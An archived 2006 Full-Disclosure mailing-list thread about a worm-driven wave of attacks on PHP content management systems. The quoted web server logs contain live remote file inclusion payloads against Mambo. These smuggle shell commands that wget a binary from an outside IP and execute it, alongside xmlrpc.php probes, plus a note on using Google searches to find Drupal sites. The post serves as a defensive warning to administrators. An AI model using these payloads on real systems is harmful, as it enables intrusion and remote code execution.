Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

RE: [Full-disclosure] PHP-based CMS mass-exploitation

from [hchemin] Network Security [Permanent Link]
Subject: RE: [Full-disclosure] PHP-based CMS mass-exploitation
Date: Wed, 08 Mar 2006 12:24:55 -0700 
This is a mambo based exploit.  There are linux based worm variants
which compromise an site running a vulnerable version of Mambo and then
execute a malicious perl script which in turns attempts to exploit
remote sites.


Harry



-------- Original Message --------
Subject: [Full-disclosure] PHP-based CMS mass-exploitation
From: "Daniel Bonekeeper" <thehazard@gmail.com>
Date: Tue, March 07, 2006 8:56 am
To: bugtraq@securityfocus.com, bugs@securitytracker.com,
news@securiteam.com,  full-disclosure@lists.grok.org.uk,
vuln@secunia.com

This is not the first time that we see those kind of "attacks", but on
the recent days, I've noticed those requests on my webservers with a
considerable frequency:

83.84.14X.XXX - - [06/Mar/2006:18:18:12 -0500] "GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo|
 HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:13 -0500] "GET
/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo|
 HTTP/1.1" 200 10110 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:14 -0500] "GET
/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo|
 HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:15 -0500] "GET
/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo|
 HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:17 -0500] "GET
/articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo|
 HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:18 -0500] "GET
/cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo|
 HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:19 -0500] "POST /xmlrpc.php
HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:20 -0500] "POST /blog/xmlrpc.php
HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:21 -0500] "POST
/blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:22 -0500] "POST
/blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:23 -0500] "POST
/drupal/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:25 -0500] "POST
/phpgroupware/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:26 -0500] "POST
/wordpress/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:27 -0500] "POST /xmlrpc.php
HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:28 -0500] "POST
/xmlrpc/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:29 -0500] "POST
/xmlsrv/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"


All of them, as we can see, are exploitation attempts to known bugged
pages (like the newest Mambo bug, the old XMLRPC problem with old
versions of Drupal, etc). I guess that they are getting a list of
domain names and trying them out with those vulns, and I believe that
they may already have some thousands of vuln machines in their hands.
Such attacks might been enhanced by using Google to guess which
domains are using which CMS... for example, looking on Google for "A
password and instructions will be sent to this e-mail address, so make
sure it is accurate." will return a bunch of Drupal websites (88,500
according to Google, even though we can see just the first 1000 ones).

This is just an advise for all admins that use those CMS, to keep, as
always, your CMS updated (almost every two weeks there are new vulns
disclosed), and also, check if you already got caught by that, if
you're running old software.

--
# (perl -e "while (1) { print "\x90"; }") | dd of=/dev/evil
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • RE: [Full-disclosure] PHP-based CMS mass-exploitation, hchemin <=
Previous by Date:  Re: [Full-disclosure] Re: recursive DNS servers DDoS as a growing DDoSproblem, gboyce
Next by Date:  [Full-disclosure] (no subject), serhat geramiya
Previous by Thread:  [Full-disclosure] RevilloC mail server USER command heap overflow, securma
Next by Thread:  [Full-disclosure] [ MDKSA-2006:054 ] - Updated kdegraphics packages fixes overflow vulnerabilities, security
Indexes:  [Date] [Thread] [Top] [All Lists]